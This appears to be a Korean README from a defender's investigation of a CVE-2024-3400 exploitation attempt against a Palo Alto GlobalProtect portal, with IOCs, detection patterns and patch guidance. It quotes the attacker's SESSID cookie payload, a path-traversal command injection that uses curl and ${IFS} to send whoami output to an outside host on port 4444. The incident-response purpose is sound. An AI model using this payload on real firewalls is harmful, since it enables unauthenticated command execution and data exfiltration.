
Palo Alto PAN-OS GlobalProtect 포털을 대상으로 한 CVE-2024-3400 악용 시도에 대한 탐지, 분석 및 대응 전략. IOCs, 악용 패턴, 완화 지침 포함.
CVE-2024-3400 악용 시도에 대한 탐지, 분석 및 대응 전략 (Palo Alto PAN-OS GlobalProtect 포털 대상). IOC, 악용 패턴 및 완화 지침 포함.
이 저장소는 Palo Alto Networks PAN-OS 소프트웨어의 GlobalProtect 포털을 표적으로 하는 중요한 인증되지 않은 명령 삽입 취약점인 CVE-2024-3400에 대한 세부 조사 및 위협 분석을 포함합니다.
2024년 4월 18일, 취약한 /global-protect/login.esp 엔드포인트를 사용하는 내부 PAN-OS 방화벽에 대해 악용 활동이 탐지되었습니다. 공격자는 백틱으로 실행된 curl 명령을 포함하는 조작된 SESSID 쿠키를 사용하여 144.172.79.92(플로리다주 마이애미)에 호스팅된 원격 C2 서버에 연결했습니다. 악용 페이로드는 간단한 필터를 우회하기 위해 ${IFS}를 활용했으며 PAN-OS의 텔레메트리 디렉토리를 사용하여 악성 활동을 단계적으로 수행했습니다. 방화벽은 200 OK로 응답했으며, 이는 페이로드가 성공적으로 실행되었을 가능성이 있음을 나타냅니다.

이벤트 ID: 249
탐지 규칙: SOC274 – PAN-OS 명령 삽입 악용
이벤트 시간: 2024년 4월 18일 03:09 UTC
호스트명: PA-Firewall-01
대상 IP: 172.16.17.139
출발지 IP: 144.172.79.92
요청 메서드: POST
엔드포인트: /global-protect/login.esp
쿠키 페이로드: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)
악성 해시:
SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
MD5: 0c1554888ce9ed0da1583dbdf7b31651
악성 스크립트: update.py (을 사용하여 실행됨)





SESSID 악용${IFS} 사용/opt/panlogs/tmp/device_telemetry에서의 페이로드 스테이징dt_send 프로세스 관여4444에서 공격자 IP로의 네트워크 콜백


10.2.9-h1, 11.0.4-h1, 11.1.2-h3 버전으로 업데이트144.172.79.92logs/: 파싱된 로그 및 원시 탐지 로그ioc/: 공격과 관련된 파일 해시 및 IPanalysis/: 악용 동작 및 프로세스 추적 심층 분석report/: 조사 로그 및 코드의 요약 및 이미지CVE-2024-3400은 Palo Alto Networks PAN-OS의 GlobalProtect 게이트웨이에 특별히 영향을 미치는 중요한 취약점입니다. 공개적으로 알려진 내용은 다음과 같습니다:
CVSS 점수: 10.0 (Critical)
게시일: 2024년 4월
영향을 받는 제품: GlobalProtect가 활성화된 PAN-OS 10.2, 11.0, 11.1
악용: 실제 환경에서 확인됨 (제로데이)
취약점 유형: 인증되지 않은 명령 삽입
CVE-2024-3400을 통해 인증되지 않은 공격자는 방화벽 운영 체제에서 임의의 명령을 실행할 수 있습니다. 이는 자격 증명 없이 영향을 받는 장치에 대한 완전한 제어권을 부여하며, Palo Alto 방화벽에 의존하는 모든 기업에 심각한 침해 지점이 됩니다.
GlobalProtect 게이트웨이가 활성화되어 있어야 합니다. 특정 PAN-OS 버전(10.2.x, 11.0.x, 11.1.x). 추가 보안 계층 뒤에 있지 않다면 인터넷을 통해 악용 가능합니다.
삽입 결함을 악용하기 위해 조작된 요청을 전송합니다. 원격 셸을 배포하거나 2단계 페이로드를 다운로드합니다. 관찰된 동작은 다음과 같습니다: 조작된 URL을 통한 명령 실행 지속성 메커니즘 네트워크 내 측면 이동
즉시 패치: Palo Alto는 수정 사항을 출시했습니다. 취약하지 않은 버전(예: 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 이상)으로 업그레이드하세요. 침해 지표(IOC) 확인: 의심스러운 프로세스, 외부 연결, 비정상적인 CLI 기록 등을 확인합니다. Shodan 또는 자산 인벤토리와 같은 도구를 사용하여 취약한 장비를 찾습니다.
GlobalProtect에 유효한 인증 없이 액세스하는 외부 IP를 확인합니다. 로그에서 의심스러운 명령 실행(show system processes, cat /etc/passwd 등)을 확인합니다. 방화벽 동작을 모니터링하고 비정상적인 외부 연결에 대해 경고합니다.
이 저장소는 내부 조사 보고서이자 PAN-OS 취약점의 실제 악용을 이해하려는 방어자를 위한 교육 리소스 역할을 합니다. 기여 및 추가 관찰을 환영합니다.
/usr/bin/python3